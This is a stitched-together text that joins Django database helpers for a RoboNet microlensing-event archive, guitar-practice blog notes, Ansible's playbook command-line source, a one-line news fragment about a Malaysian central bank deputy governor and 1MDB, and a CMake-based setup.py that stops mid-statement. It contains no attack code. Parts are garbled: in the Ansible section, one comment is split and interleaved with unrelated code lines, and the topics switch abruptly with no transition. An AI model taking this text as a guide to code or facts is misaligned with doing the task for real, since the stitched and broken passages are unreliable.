e.g. "1m0-05" instrument -- Instrument identifier.(string, required) e.g. "kb78" group_id -- Group identifier. (string, required) e.g. "RBN20150922T15.42112818" track_id -- Track identifier. (string, required) e.g. "0000110965" req_id -- Request identifier. (string, required) e.g. "0000427795" airmass -- Airmass. (float, required) fwhm -- average fwhm of stars. (in pixels) (float, required) sky_bg -- sky background value. (in ADU) (float, required) sd_bg -- error in sky_bg (float, required) moon_sep -- angular distance of centre of moon from target. (float, required) elongation -- estimated elongation of stars. (float, required) nstars -- number of stars found in image. (integer, required) quality -- image quality assessment. 
(string, required) """ if event_name.startswith("OGLE") and check_exists(event_name)==True: # Get event identifier ev = Event.objects.get(ev_name_ogle=event_name) ev.robonet_log_set.update_or_create(event=event_name, image_name=image_name, timestamp=timestamp, exptime=exptime, filter1=filter1, filter2=filter2, filter3=filter3, telescope=telescope, instrument=instrument, group_id=group_id, track_id=track_id, req_id=req_id, airmass=airmass, fwhm=fwhm, sky_bg=sky_bg, sd_bg=sd_bg, moon_sep=moon_sep, elongation=elongation, nstars=nstars, quality=quality) ev.save() successful = True elif event_name.startswith("MOA") and check_exists(event_name)==True: ev = Event.objects.get(ev_name_moa=event_name) ev.robonet_log_set.update_or_create(event=event_name, image_name=image_name, timestamp=timestamp, exptime=exptime, filter1=filter1, filter2=filter2, filter3=filter3, telescope=telescope, instrument=instrument, group_id=group_id, track_id=track_id, req_id=req_id, airmass=airmass, fwhm=fwhm, sky_bg=sky_bg, sd_bg=sd_bg, moon_sep=moon_sep, elongation=elongation, nstars=nstars, quality=quality) ev.save() successful = True elif event_name.startswith("KMT") and check_exists(event_name)==True: ev = Event.objects.get(ev_name_kmt=event_name) ev.robonet_log_set.update_or_create(event=event_name, image_name=image_name, timestamp=timestamp, exptime=exptime, filter1=filter1, filter2=filter2, filter3=filter3, telescope=telescope, instrument=instrument, group_id=group_id, track_id=track_id, req_id=req_id, airmass=airmass, fwhm=fwhm, sky_bg=sky_bg, sd_bg=sd_bg, moon_sep=moon_sep, elongation=elongation, nstars=nstars, quality=quality) ev.save() successful = True else: successful = False return successful ################################################################################################################ def update_reduction(event_name, lc_file, timestamp, version, ref_image, ron=0.0, gain=1.0, oscanx1=1, oscanx2=50, oscany1=1, oscany2=500, imagex1=51, imagex2=1000, imagey1=1, imagey2=1000, minval=1.0, maxval=55000.0, growsatx=0, growsaty=0, coeff2=1.0e-06, coeff3=1.0e-12, sigclip=4.5, sigfrac=0.5, flim=2.0, niter=4, use_reflist=0, max_nimages=1, max_sky=5000.0, min_ell=0.8, trans_type='polynomial', trans_auto=0, replace_cr=0, min_scale=0.99, max_scale=1.01, fov=0.1, star_space=30, init_mthresh=1.0, smooth_pro=2, smooth_fwhm=3.0, var_deg=1, det_thresh=2.0, psf_thresh=8.0, psf_size=8.0, psf_comp_dist=0.7, psf_comp_flux=0.1, psf_corr_thresh=0.9, ker_rad=2.0, lres_ker_rad=2.0, subframes_x=1, subframes_y=1, grow=0.0, ps_var=0, back_var=1, diffpro=0): """ Add or Update the lightcurve location and pipeline event reduction parameters in the database. Also stores the reference frame name and DanDIA parameters used to generate the lightcurve. Keyword arguments: event_name -- The event name. (string, required) e.g. "OGLE-2015-BLG-1234" lc_file -- The lightcurve file. (string, required) timestamp -- The date the lightcurve file was created. (datetime, required) e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>) version -- Reduction identifier (integer, required) ref_image -- Reference image used. (string, required) -+-+- DanDIA parameters -+-+- ron -- CCD readout noise (in ADU) (float, optional, default=0.0) gain -- CCD gain. 
            (e-/ADU) (float, optional, default=1.0)
    oscanx1 -- Overscan strip coordinate x1 (integer, optional, default=1)
    oscanx2 -- Overscan strip coordinate x2 (integer, optional, default=50)
    oscany1 -- Overscan strip coordinate y1 (integer, optional, default=1)
    oscany2 -- Overscan strip coordinate y2 (integer, optional, default=500)
    imagex1 -- Image region coordinate x1 (integer, optional, default=51)
    imagex2 -- Image region coordinate x2 (integer, optional, default=1000)
    imagey1 -- Image region coordinate y1 (integer, optional, default=1)
    imagey2 -- Image region coordinate y2 (integer, optional, default=1000)
    minval -- Minimum useful pixel value in a raw image (ADU). (float, optional, default=1.0)
    maxval -- Maximum useful pixel value in a raw image (ADU). (float, optional, default=55000.0)
    growsatx -- Half box size in the x direction (pix) to be used for growing saturated bad pixels
                in the bad pixel mask for each science image. This parameter should be non-negative.
                (integer, optional, default=0)
    growsaty -- Half box size in the y direction (pix) to be used for growing saturated bad pixels
                in the bad pixel mask for each science image. This parameter should be non-negative.
                (integer, optional, default=0)
    coeff2 -- Coefficient a1 in the linearisation equation: Xnew = X + a1*X^2 + a2*X^3
              where X represents the image counts after bias level and bias pattern correction.
              (float, optional, default=1.0e-06)
    coeff3 -- Coefficient a2 in the linearisation equation: Xnew = X + a1*X^2 + a2*X^3
              where X represents the image counts after bias level and bias pattern correction.
              (float, optional, default=1.0e-12)
    sigclip -- Threshold in units of sigma for cosmic ray detection on the Laplacian image.
               This parameter should be positive. (float, optional, default=4.5)
    sigfrac -- Fraction of "sigclip" to be used as a threshold for cosmic ray growth.
               This parameter should be positive. (float, optional, default=0.5)
    flim -- Minimum contrast between the Laplacian image and the fine structure image.
            This parameter should be positive. (float, optional, default=2.0)
    niter -- Maximum number of iterations to perform. This parameter should be positive.
             (integer, optional, default=4)
    use_reflist -- Use images in reflist.<filt>.txt? (integer, optional, default=0 (No))
    max_nimages -- Maximum number of images to combine for reference. (integer, optional, default=1)
    max_sky -- Maximum acceptable value for sky background. (float, optional, default=5000.0)
    min_ell -- Minimum PSF ellipticity for image to be used in reference. (float, optional, default=0.8)
    trans_type -- Type of coordinate transformation to fit when fitting a coordinate transformation
                  between two images.
                  Options: ["shift"=General pixel shift, "rot_shift"=Rotation and general pixel shift,
                  "rot_mag_shift"=Rotation, magnification and general pixel shift, "linear"=Linear,
                  "polynomial"=Polynomial] (string, optional, default='polynomial')
    trans_auto -- Use automatic determination of the coordinate transformation type when fitting a
                  coordinate transformation between two images? (integer, optional, default=0 (No))
    replace_cr -- Replace cosmic ray pixels? (integer, optional, default=0 (No))
    min_scale -- Minimum possible transformation scale factor (magnification) between any two images.
                 (float, optional, default=0.99)
    max_scale -- Maximum possible transformation scale factor (magnification) between any two images.
                 (float, optional, default=1.01)
    fov -- Field of view of the CCD camera (deg). (float, optional, default=0.1)
    star_space -- Average spacing (pix) between stars.
                  (integer, optional, default=30)
    init_mthresh -- Initial distance threshold (pix) to reject false star matches.
                    (float, optional, default=1.0)
    smooth_pro -- Smooth image? (integer, optional, default=2)
    smooth_fwhm -- Amount of smoothing to perform (float, optional, default=3.0)
    var_deg -- Polynomial degree of the spatial variation of the model used to represent the image
               PSF. (0=Constant, 1=Linear, 2=Quadratic, 3=Cubic) (integer, optional, default=1)
    det_thresh -- Detection threshold used to detect stars in units of image sky sigma.
                  (float, optional, default=2.0)
    psf_thresh -- Detection threshold used to detect candidate PSF stars in units of image sky sigma.
                  (float, optional, default=8.0)
    psf_size -- Size of the model PSF stamp in units of FWHM. (float, optional, default=8.0)
    psf_comp_dist -- Any star within a distance "0.5*psf_comp_dist*psf_size", in units of FWHM,
                     of another star is considered to be a companion of that star for PSF star
                     selection. (float, optional, default=0.7)
    psf_comp_flux -- Maximum flux ratio that any companion star may have for a star to be
                     considered a PSF star. (float, optional, default=0.1)
    psf_corr_thresh -- Minimum correlation coefficient of a star with the image PSF model in order
                       to be considered a PSF star. (float, optional, default=0.9)
    ker_rad -- Radius of the kernel pixel array in units of image FWHM. (float, optional, default=2.0)
    lres_ker_rad -- Threshold radius of the kernel pixel array, in units of image FWHM, beyond
                    which kernel pixels are of lower resolution. (float, optional, default=2.0)
    subframes_x -- Number of subdivisions in the x direction used in defining the grid of kernel
                   solutions. (integer, optional, default=1)
    subframes_y -- Number of subdivisions in the y direction used in defining the grid of kernel
                   solutions. (integer, optional, default=1)
    grow -- Amount of overlap between the image regions used for the kernel solutions.
            (float, optional, default=0.0)
    ps_var -- Use spatially variable photometric scale factor? (integer, optional, default=0 (No))
    back_var -- Use spatially variable differential background? (integer, optional, default=1 (Yes))
    diffpro -- Switch for the method of difference image creation.
        (integer, optional, default=0 (No))
    """
    # Map each survey prefix to the Event field that holds that survey's name.
    field_for_prefix = {'OGLE': 'ev_name_ogle', 'MOA': 'ev_name_moa', 'KMT': 'ev_name_kmt'}
    for prefix, field in field_for_prefix.items():
        if event_name.startswith(prefix) and check_exists(event_name):
            # Get event identifier
            ev = Event.objects.get(**{field: event_name})
            ev.robonet_reduction_set.update_or_create(
                event=event_name, lc_file=lc_file, timestamp=timestamp, version=version,
                ref_image=ref_image, ron=ron, gain=gain,
                oscanx1=oscanx1, oscanx2=oscanx2, oscany1=oscany1, oscany2=oscany2,
                imagex1=imagex1, imagex2=imagex2, imagey1=imagey1, imagey2=imagey2,
                minval=minval, maxval=maxval, growsatx=growsatx, growsaty=growsaty,
                coeff2=coeff2, coeff3=coeff3, sigclip=sigclip, sigfrac=sigfrac,
                flim=flim, niter=niter, use_reflist=use_reflist, max_nimages=max_nimages,
                max_sky=max_sky, min_ell=min_ell, trans_type=trans_type,
                trans_auto=trans_auto, replace_cr=replace_cr,
                min_scale=min_scale, max_scale=max_scale, fov=fov, star_space=star_space,
                init_mthresh=init_mthresh, smooth_pro=smooth_pro, smooth_fwhm=smooth_fwhm,
                var_deg=var_deg, det_thresh=det_thresh, psf_thresh=psf_thresh,
                psf_size=psf_size, psf_comp_dist=psf_comp_dist, psf_comp_flux=psf_comp_flux,
                psf_corr_thresh=psf_corr_thresh, ker_rad=ker_rad, lres_ker_rad=lres_ker_rad,
                subframes_x=subframes_x, subframes_y=subframes_y, grow=grow,
                ps_var=ps_var, back_var=back_var, diffpro=diffpro)
            ev.save()
            return True
    return False

################################################################################################################
def update_request(event_name, t_sample, exptime, timestamp=None, onem_on=False,
                   twom_on=False, request_type='M', which_filter='ip'):
    """ Update or Add robonet observing request to the database.

    Keyword arguments:
    event_name -- The event name. (string, required)
        e.g. "OGLE-2015-BLG-1234"
    t_sample -- Sampling interval to use. (in minutes) (float, required)
    exptime -- Exposure time to use. (in seconds) (integer, required)
    timestamp -- The request submission time. (datetime, optional, default=the current time)
        e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>)
    onem_on -- Observe on 1m network? (boolean, optional, default=False)
    twom_on -- Observe on 2m network? (boolean, optional, default=False)
    request_type -- Observation request class. (string, optional, default='M')
        ('T':'ToO', 'M':'Monitor', 'S':'Single')
    which_filter -- Filter identifier string. (string, optional, default='ip')
    """
    if timestamp is None:
        # Resolve "now" per call; a timezone.now() default argument would be
        # evaluated once at import time and then reused for every call.
        timestamp = timezone.now()
    field_for_prefix = {'OGLE': 'ev_name_ogle', 'MOA': 'ev_name_moa', 'KMT': 'ev_name_kmt'}
    for prefix, field in field_for_prefix.items():
        if event_name.startswith(prefix) and check_exists(event_name):
            # Get event identifier
            ev = Event.objects.get(**{field: event_name})
            ev.robonet_request_set.update_or_create(
                event=event_name, timestamp=timestamp, onem_on=onem_on, twom_on=twom_on,
                t_sample=t_sample, exptime=exptime, request_type=request_type,
                which_filter=which_filter)
            ev.save()
            return True
    return False

################################################################################################################
def update_status(event_name, timestamp=None, priority='L', status='AC', comment='--',
                  updated_by='--', omega=0.0):
    """ Update or Add robonet status to the database.

    Keyword arguments:
    event_name -- The event name. (string, required)
        e.g. "OGLE-2015-BLG-1234"
    timestamp -- The request submission time. (datetime, optional, default=the current time)
        e.g. datetime(2015, 9, 23, 15, 26, 13, 104683, tzinfo=<UTC>)
    priority -- Priority flag for human observers. (A:anomaly, H:high, M:medium, L:low)
        (string, optional, default='L')
    status -- Event status. (CH:check, AC:active, AN:anomaly, RE:rejected, EX:expired)
        (string, optional, default='AC')
    comment -- Comment field. (string, optional, default='--')
    updated_by -- Updated by which user? (string, optional, default='--')
    omega -- Priority value calculated based on parameters.
        (float, optional, default=0.0)
    """
    if timestamp is None:
        timestamp = timezone.now()
    field_for_prefix = {'OGLE': 'ev_name_ogle', 'MOA': 'ev_name_moa', 'KMT': 'ev_name_kmt'}
    for prefix, field in field_for_prefix.items():
        if event_name.startswith(prefix) and check_exists(event_name):
            # Get event identifier
            ev = Event.objects.get(**{field: event_name})
            ev.robonet_status_set.update_or_create(
                event=event_name, timestamp=timestamp, priority=priority, status=status,
                comment=comment, updated_by=updated_by, omega=omega)
            ev.save()
            return True
    return False

################################################################################################################
##TEST
def run_test():
    # Populate Event database
    from glob import glob
    ogle_event_list = glob('/work/Tux8/ytsapras/Data/RoboNet/ARTEMiS/PublishedParameters/2015/OGLE/*.model')
    count = 0
    for i in ogle_event_list:
        data = open(i).read().split()
        ev_ra = data[0]
        ev_dec = data[1]
        event_name = data[2].replace('OB15', 'OGLE-2015-BLG-')
        add_new_event(event_name, ev_ra, ev_dec)
        count = count + 1
    print(count)
    # Populate Ogle_Detail database
    ogle_event_list = glob('/work/Tux8/ytsapras/Data/RoboNet/ARTEMiS/PublishedParameters/2015/OGLE/*.model')
    count = 0
    for i in ogle_event_list:
        data = open(i).read().split()
        event_name = data[2].replace('OB15', 'OGLE-2015-BLG-')
        Tmax = 2450000.0 + float(data[3])
        tau = float(data[5])
        umin = float(data[7])
        year, og_id = '20' + data[2][2:4], data[2].replace('OB15', 'blg-')
        url_link = 'http://ogle.astrouw.edu.pl/ogle4/ews/%s/%s.html' % (year, og_id)
        last_updated = timezone.now()
        ogle_details(event_name=event_name, Tmax=Tmax, tau=tau, umin=umin,
                     url_link=url_link, last_updated=last_updated)
        count = count + 1
    print(count)
    # Populate Data_File database
    from astropy.time import Time
    ogle_dat_list = glob('/work/Tux8/ytsapras/Data/RoboNet/ARTEMiS/data/*OB15*I.dat')
    count = 0
    for i in ogle_dat_list:
        data = open(i).readlines()
        data = data[1:]
        if (data != []):
            event_name = i.split('/')[-1][1:-5].replace('OB15', 'OGLE-2015-BLG-')
            datafile = i
            last_upd = Time(float('245' + data[-1].split()[2]), format='jd').datetime
            last_upd = timezone.make_aware(last_upd, timezone.get_current_timezone())
            last_mag = float(data[-1].split()[0])
            ndat = len(data) - 1
            tel = i.split('/')[-1][0:1]
            ver = 1
            update_data(event_name, datafile, last_upd, last_mag, tel, ver, ndat)
            count = count + 1
    print(count)
    # Populate Robonet_Status database
    count = 0
    ogle_events_list = Event.objects.filter(ev_name_ogle__contains="OGLE")
    for event_id in ogle_events_list:
        event_name = event_id.ev_name_ogle
        update_status(event_name, timestamp=timezone.now(), priority='L', status='AC',
                      comment='--', updated_by='--')
        count = count + 1
    print(count)
    # Populate Robonet_Request database
    import random
    count = 0
    ogle_events_list = Event.objects.filter(ev_name_ogle__contains="OGLE")
    for event_id in ogle_events_list:
        event_name = event_id.ev_name_ogle
        t_sample = random.uniform(0.1, 24.0)
        exptime = random.randint(10, 300)
        update_request(event_name, t_sample, exptime, timestamp=timezone.now(),
                       onem_on=False, twom_on=False, request_type='M', which_filter='ip')
        count = count + 1
    print(count)
    # Populate Robonet_Log database
    count = 0
    ogle_events_list = Event.objects.filter(ev_name_ogle__contains="OGLE")
    for event_id in ogle_events_list:
        event_name = event_id.ev_name_ogle
        image_name = "image_name.fits"
        timestamp = timezone.now()
        exptime = random.randint(10, 300)
        filter1 = 'air'
        filter2 = 'ip'
        filter3 = 'air'
        telescope = '1m0-02'
        instrument = 'kb70'
        group_id = "RBN20150922T15.42112818"
        track_id = "0000110965"
        req_id = "0000427795"
        airmass = 1.33
        fwhm = 6.45
        sky_bg = 2143.5435347
        sd_bg = 80.543
        moon_sep = 18.43
        elongation = 1.2345234
        nstars = 120
        quality = "Rejected: High FWHM of stars "
        update_log(event_name, image_name, timestamp, exptime, filter1, filter2, filter3,
                   telescope, instrument, group_id, track_id, req_id, airmass, fwhm,
                   sky_bg, sd_bg, moon_sep, elongation, nstars, quality)
        count = count + 1
    print(count)
    # Populate Robonet_Reduction database
    count = 0
    ogle_events_list = Event.objects.filter(ev_name_ogle__contains="OGLE")
    for event_id in ogle_events_list:
        event_name = event_id.ev_name_ogle
        lc_file = 'lc_' + event_name + '_ip.t'
        timestamp = timezone.now()
        version = 1
        ref_image = 'reference.fits'
        update_reduction(event_name, lc_file, timestamp, version, ref_image,
                         ron=0.0, gain=1.0, oscanx1=1, oscanx2=50, oscany1=1, oscany2=500,
                         imagex1=51, imagex2=1000, imagey1=1, imagey2=1000,
                         minval=1.0, maxval=55000.0, growsatx=0, growsaty=0,
                         coeff2=1.0e-06, coeff3=1.0e-12, sigclip=4.5, sigfrac=0.5,
                         flim=2.0, niter=4, use_reflist=0, max_nimages=1, max_sky=5000.0,
                         min_ell=0.8, trans_type='polynomial', trans_auto=0, replace_cr=0,
                         min_scale=0.99, max_scale=1.01, fov=0.1, star_space=30,
                         init_mthresh=1.0, smooth_pro=2, smooth_fwhm=3.0, var_deg=1,
                         det_thresh=2.0, psf_thresh=8.0, psf_size=8.0, psf_comp_dist=0.7,
                         psf_comp_flux=0.1, psf_corr_thresh=0.9, ker_rad=2.0,
                         lres_ker_rad=2.0, subframes_x=1, subframes_y=1, grow=0.0,
                         ps_var=0, back_var=1, diffpro=0)
        count = count + 1
    print(count)
    # Populate Single_Model database
    ogle_event_list = glob('/work/Tux8/ytsapras/Data/RoboNet/ARTEMiS/model/OB15*.model')
    count = 0
    for i in ogle_event_list:
        data = open(i).read().split()
        event_name = data[2].replace('OB15', 'OGLE-2015-BLG-')
        Tmax = 2450000.0 + float(data[3])
        e_Tmax = float(data[4])
        tau = float(data[5])
        e_tau = float(data[6])
        umin = float(data[7])
        e_umin = float(data[8])
        if (data[12] != '0.0'):
            last_updated = Time(float('245' + data[12]), format='jd').datetime
            last_updated = timezone.make_aware(last_updated, timezone.get_current_timezone())
        else:
            last_updated = timezone.now()
        single_lens_par(event_name, Tmax, e_Tmax, tau, e_tau, umin, e_umin, last_updated)
        count = count + 1
    print(count)
    len(Event.objects.all())

def run_test2():
    # Path to ARTEMiS files
    artemis = "/work/Tux8/ytsapras/Data/RoboNet/ARTEMiS/"
    # Color & site definitions for plotting
    colors = artemis + "colours.sig.cfg"
    colordef = artemis + "colourdef.sig.cfg"
    # Set up and populate dictionaries
    col_dict = {}
    site_dict = {}
    with open(colors) as f:
        for line in f:
            elem = line.split()
            key = elem[0]
            tel_id = " ".join([e.replace('"', '') for e in elem[3:]])
            vals = [elem[1], elem[2], tel_id]
            site_dict[key] = vals
    with open(colordef) as f:
        for line in f:
            elem = line.split()
            key = elem[0]
            val = elem[1]
            col_dict[key] = val
    # Populate Operator database
    for s in ['OGLE', 'MOA', 'KMTNet', 'WISE', 'PLANET', 'RoboNet', 'uFUN', 'Other']:
        add_operator(s)
    # Populate Telescope database
    from random import uniform
    for i in site_dict.keys():
        tel_name = site_dict[i][-1]
        if ('LCOGT' in tel_name) or ('Liverpool' in tel_name):
            # Get the appropriate pk for RoboNet
            operator = Operator.objects.get(name='RoboNet')
            site = tel_name.split(' ')[1]
        elif 'OGLE' in tel_name:
            operator = Operator.objects.get(name='OGLE')
            site = 'CTIO'
        elif 'MOA' in tel_name:
            operator = Operator.objects.get(name='MOA')
            site = 'New Zealand'
        else:
            operator = Operator.objects.get(name='Other')
            site = ''
        aperture = uniform(1.0, 2.0)
        add_telescope(operator=operator, telescope_name=tel_name, aperture=aperture, site=site)
    # Populate Instrument database
    for i in Telescope.objects.all().values():
        inst = i['name'] + ' CCD camera'
        telescope = Telescope.objects.get(name=i['name'])
        pixscale = uniform(0.1, 1.4)
        add_instrument(telescope=telescope, instrument_name=inst, pixscale=pixscale)
    # Add a few test instruments at existing telescopes
    telescope = Telescope.objects.get(name='LCOGT SAAO 1m A')
    inst = '!!!TEST SAA0 1m A NEW INST!!!'
    pixscale = uniform(0.1, 1.4)
    add_instrument(telescope=telescope, instrument_name=inst, pixscale=pixscale)
    telescope = Telescope.objects.get(name='Faulkes North 2.0m')
    inst = '!!!TEST FTN 2.0m NEW INST!!!'
    pixscale = uniform(0.1, 1.4)
    add_instrument(telescope=telescope, instrument_name=inst, pixscale=pixscale)
    telescope = Telescope.objects.get(name='LCOGT CTIO 1m A')
    inst = '!!!TEST CTIO 1m A NEW INST!!!'
    pixscale = uniform(0.1, 1.4)
    add_instrument(telescope=telescope, instrument_name=inst, pixscale=pixscale)
    # Populate Filter database
    filters = ['Bessell-U', 'Bessell-B', 'Bessell-V', 'Bessell-R', 'Bessell-I',
               'SDSS-u', 'SDSS-g', 'SDSS-r', 'SDSS-i', 'SDSS-z', 'H-alpha']
    for i in Instrument.objects.all():
        for j in filters:
            add_filter(instrument=i, filter_name=j)
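For orientation, here is a minimal usage sketch of the update helpers above; the event name and parameter values are illustrative only:

# Flag an event as an active, high-priority target; returns False if the
# event is unknown or its name has an unrecognised survey prefix.
ok = update_status('OGLE-2015-BLG-1234', priority='H', status='AC',
                   comment='possible anomaly', updated_by='ytsapras', omega=5.2)

# Request a 30-minute cadence with 200 s exposures on the 1m network.
ok = ok and update_request('OGLE-2015-BLG-1234', t_sample=30.0, exptime=200,
                           onem_on=True)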
1) Recording the lessons is easy, both in audio and video. The student can later review the lesson, or practice with the recording if appropriate.
2) Zooming in on either hand is easy by moving the camera or the player around, so the teacher can look at the student's hands, or vice-versa.
3) Re-scheduling due to traveling is reduced - students who are away can keep their regular lesson times, or find an alternate time for that week more easily.
4) Lessons are available to students who do not live in town.
5) The personal connection we expect to have in private lessons might take a little longer to set in, but after a couple of weeks things do feel great.

Great Guitar Exercises You'll Never Do! Here I'll be discussing some excellent exercises that can really help your playing, but look, sound, or feel weird. Many of them are familiar, or make sense. We hear about them, and nod approvingly - and go on doing something else. Others just don't seem like they would be helpful, no matter how often we hear about them from amazing players. I'm posting each one as a comment. Take the title as a dare, and try out these suckers.

For a while I have been asking my students to film the pieces they are playing and to send me those videos between lessons - especially when we don't meet every week.
1) If it's a new song, I can note-check their performance easily while it's still slow, before any mis-readings become mechanized. The same goes for the rhythm.
2) Body tension is very clear - you can say "at 2 minutes and 13 seconds your right shoulder locks up in anticipation of the arpeggio section - practice getting there, stop, relax, and continue."
3) It keeps the student accountable between lessons, discouraging cramming.
4) It is a brutal reality check that can be done privately - it all but eliminates the tendency some students have to play material that is too difficult too soon.
I am just making the transition from recording to filming my own practice - I'll post my ideas as things work out.

A good audio recording of your playing is a great practice tool. Everton Gloeden, from the Brazilian Guitar Quartet, once told me he thought it helped him so much that he believed practicing without recording was a waste of his time! But how do we do it? It depends on what you want to get out of it. A simple way of starting off is playing through the music once, and then listening until something catches your ear. Pause the playback and work out that section, then move on. Don't dismiss any problem as a mere accident. If it really was just that, you won't spend much time working on it. Also, don't worry about sections that sound good in the recording but that you've labeled as difficult in your mind. Use the recording as a reality check. Play slowly enough that you can actually hear the problems, rather than letting speed hide them or excuse them.

First, it's good material and a great way to get back into top playing shape for the summer. Second, Scott is coming to New Mexico to do a workshop, and in case I can make it there, it would be great to be re-familiarized with his ideas.
# (c) 2012, Michael DeHaan <[email protected]> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. ######################################################## from __future__ import (absolute_import, division, print_function) __metaclass__ = type import os import stat from ansible.cli import CLI from ansible.errors import AnsibleError, AnsibleOptionsError from ansible.executor.playbook_executor import PlaybookExecutor from ansible.playbook.block import Block from ansible.playbook.play_context import PlayContext try: from __main__ import display except ImportError: from ansible.utils.display import Display display = Display() class PlaybookCLI(CLI): ''' the tool to run *Ansible playbooks*, which are a configuration and multinode deployment system. See the project home page (https://docs.ansible.com) for more information. ''' def parse(self): # create parser for CLI options parser = CLI.base_parser( usage="%prog [options] playbook.yml [playbook2 ...]", connect_opts=True, meta_opts=True, runas_opts=True, subset_opts=True, check_opts=True, inventory_opts=True, runtask_opts=True, vault_opts=True, fork_opts=True, module_opts=True, desc="Runs Ansible playbooks, executing the defined tasks on the targeted hosts.", ) # ansible playbook specific opts parser.add_option('--list-tasks', dest='listtasks', action='store_true', help="list all tasks that would be executed") parser.add_option('--list-tags', dest='listtags', action='store_true', help="list all available tags") parser.add_option('--step', dest='step', action='store_true', help="one-step-at-a-time: confirm each task before running") parser.add_option('--start-at-task', dest='start_at_task', help="start the playbook at the task matching this name") self.parser = parser super(PlaybookCLI, self).parse() if len(self.args) == 0: raise AnsibleOptionsError("You must specify a playbook file to run") display.verbosity = self.options.verbosity self.validate_conflicts(runas_opts=True, vault_opts=True, fork_opts=True) def run(self): super(PlaybookCLI, self).run() # Note: slightly wrong, this is written so that implicit localhost # Manage passwords sshpass = None becomepass = None passwords = {} # initial error check, to make sure all specified playbooks are accessible # before we start running anything through the playbook executor for playbook in self.args: if not os.path.exists(playbook): raise AnsibleError("the playbook: %s could not be found" % playbook) if not (os.path.isfile(playbook) or stat.S_ISFIFO(os.stat(playbook).st_mode)): raise AnsibleError("the playbook: %s does not appear to be a file" % playbook) # don't deal with privilege escalation or passwords when we don't need to if not self.options.listhosts and not self.options.listtasks and not self.options.listtags and not self.options.syntax: self.normalize_become_options() (sshpass, becomepass) = self.ask_passwords() passwords = {'conn_pass': sshpass, 'become_pass': becomepass} loader, inventory, 
variable_manager = self._play_prereqs(self.options) # (which is not returned in list_hosts()) is taken into account for # warning if inventory is empty. But it can't be taken into account for # checking if limit doesn't match any hosts. Instead we don't worry about # limit if only implicit localhost was in inventory to start with. # # Fix this when we rewrite inventory by making localhost a real host (and thus show up in list_hosts()) hosts = CLI.get_host_list(inventory, self.options.subset) # flush fact cache if requested if self.options.flush_cache: self._flush_cache(inventory, variable_manager) # create the playbook executor, which manages running the plays via a task queue manager pbex = PlaybookExecutor(playbooks=self.args, inventory=inventory, variable_manager=variable_manager, loader=loader, options=self.options, passwords=passwords) results = pbex.run() if isinstance(results, list): for p in results: display.display('\nplaybook: %s' % p['playbook']) for idx, play in enumerate(p['plays']): if play._included_path is not None: loader.set_basedir(play._included_path) else: pb_dir = os.path.realpath(os.path.dirname(p['playbook'])) loader.set_basedir(pb_dir) msg = "\n play #%d (%s): %s" % (idx + 1, ','.join(play.hosts), play.name) mytags = set(play.tags) msg += '\tTAGS: [%s]' % (','.join(mytags)) if self.options.listhosts: playhosts = set(inventory.get_hosts(play.hosts)) msg += "\n pattern: %s\n hosts (%d):" % (play.hosts, len(playhosts)) for host in playhosts: msg += "\n %s" % host display.display(msg) all_tags = set() if self.options.listtags or self.options.listtasks: taskmsg = '' if self.options.listtasks: taskmsg = ' tasks:\n' def _process_block(b): taskmsg = '' for task in b.block: if isinstance(task, Block): taskmsg += _process_block(task) else: if task.action == 'meta': continue all_tags.update(task.tags) if self.options.listtasks: cur_tags = list(mytags.union(set(task.tags))) cur_tags.sort() if task.name: taskmsg += " %s" % task.get_name() else: taskmsg += " %s" % task.action taskmsg += "\tTAGS: [%s]\n" % ', '.join(cur_tags) return taskmsg all_vars = variable_manager.get_vars(play=play) play_context = PlayContext(play=play, options=self.options) for block in play.compile(): block = block.filter_tagged_tasks(play_context, all_vars) if not block.has_tasks(): continue taskmsg += _process_block(block) if self.options.listtags: cur_tags = list(mytags.union(all_tags)) cur_tags.sort() taskmsg += " TASK TAGS: [%s]\n" % ', '.join(cur_tags) display.display(taskmsg) return 0 else: return results def _flush_cache(self, inventory, variable_manager): for host in inventory.list_hosts(): hostname = host.get_name() variable_manager.clear_facts(hostname)
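For context, PlaybookCLI is normally driven by the ansible-playbook entry-point script rather than instantiated directly; the flow is roughly the following sketch (error handling omitted):

import sys

cli = PlaybookCLI(sys.argv)
cli.parse()             # builds self.options/self.args, raises AnsibleOptionsError on bad input
exit_code = cli.run()   # 0 on success, or the PlaybookExecutor result code
sys.exit(exit_code)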
A central bank cannot operate in isolation, adds Nor Shamsiah. Nor Shamsiah Mohd Yunus, a former deputy governor of the bank who probed 1MDB under then-governor Zeti, is widely tipped to return.
#!/usr/bin/env python3 # -*- coding: utf-8 -*- import os import re import sys import platform import subprocess from setuptools import setup, Extension from setuptools.command.build_ext import build_ext from distutils.version import LooseVersion class CMakeExtension(Extension): def __init__(self, name, sourcedir=''): Extension.__init__(self, name, sources=[]) self.sourcedir = os.path.abspath(sourcedir) class CMakeBuild(build_ext): def run(self): try: out = subprocess.check_output(['cmake', '--version']) except OSError: raise RuntimeError("CMake must be installed to build the following extensions: " + ", ".join(e.name for e in self.extensions)) if platform.system() == "Windows": cmake_version = LooseVersion(re.search(r'version\s*([\d.]+)', out.decode()).group(1)) if cmake_version < '3.1.0': raise RuntimeError("CMake >= 3.1.0 is required on Windows") for ext in self.extensions: self.build_extension(ext) def build_extension(self, ext): extdir = os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name))) # required for auto-detection of auxiliary "native" libs if not extdir.endswith(os.path.sep): extdir += os.path.sep cmake_args = ['-DCMAKE_LIBRARY_OUTPUT_DIRECTORY=' + extdir, '-DPYTHON_EXECUTABLE=' + sys.executable, '-DCMAKE_CXX_COMPILER=ngscxx', '-DCMAKE_LINKER=ngsld', '-DBUILD_STUB_FILES=ON', '-DBUILD_NGSOLVE=OFF'] cfg = 'Debug' if self.debug else 'Release' build_args = ['--config', cfg] if platform.system() == "Windows": #not expected to work... (but who knows..) cmake_args += ['-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_{}={}'.format(cfg.upper(), extdir)] if sys.maxsize > 2**32: cmake_args += ['-A', 'x64'] build_args += ['--', '/m'] else: cmake_args += ['-DCMAKE_BUILD_TYPE=' 